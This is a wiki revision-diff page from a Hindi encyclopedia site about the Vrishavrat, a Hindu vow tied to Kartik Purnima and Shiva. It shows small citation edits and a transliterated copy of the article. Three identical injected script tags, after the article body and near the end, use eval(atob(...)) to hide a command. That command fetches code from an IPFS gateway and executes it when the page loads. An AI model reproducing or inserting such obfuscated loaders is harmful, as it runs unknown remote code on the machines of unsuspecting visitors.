Difference between revisions of "वृष व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
m (Text replace - ")</ref" to "</ref")
 
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
*वृषव्रत [[विष्णु]] व्रत के समान ही है।<ref>कृत्यकल्पतरु (व्रत खण्ड 448, [[मत्स्य पुराण]] 101|64 का उद्धरण)</ref>
+
*वृषव्रत [[विष्णु]] व्रत के समान ही है।<ref>कृत्यकल्पतरु (व्रत खण्ड 448, [[मत्स्य पुराण]] 101|64 का उद्धरण</ref>
 
*[[कार्तिक]] [[पूर्णिमा]] पर साँड़ छोड़ना एवं नक्तविधि से व्रत करना चाहिए।
 
*[[कार्तिक]] [[पूर्णिमा]] पर साँड़ छोड़ना एवं नक्तविधि से व्रत करना चाहिए।
 
*वृषव्रत तिथिव्रत; [[देवता]] [[शिव]] है।
 
*वृषव्रत तिथिव्रत; [[देवता]] [[शिव]] है।
*ऐसी मान्यता है कि वृषव्रत से शिव लोक की प्राप्ति होती है।<ref>हेमाद्रि (व्रत खण्ड 2, 242)</ref>
+
*ऐसी मान्यता है कि वृषव्रत से शिव लोक की प्राप्ति होती है।<ref>हेमाद्रि (व्रत खण्ड 2, 242</ref>
 
{{संदर्भ ग्रंथ}}
 
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==

Latest revision as of 13:00, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • vrishavrat vishnu vrat ke saman hi hai.[1]
  • kartik poornima par saan d chho dana evan naktavidhi se vrat karana chahie.
  • vrishavrat tithivrat; devata shiv hai.
  • aisi manyata hai ki vrishavrat se shiv lok ki prapti hoti hai.[2]

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. krityakalpataru (vrat khand 448, matsy puran 101|64 ka uddharan
  2. hemadri (vrat khand 2, 242

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>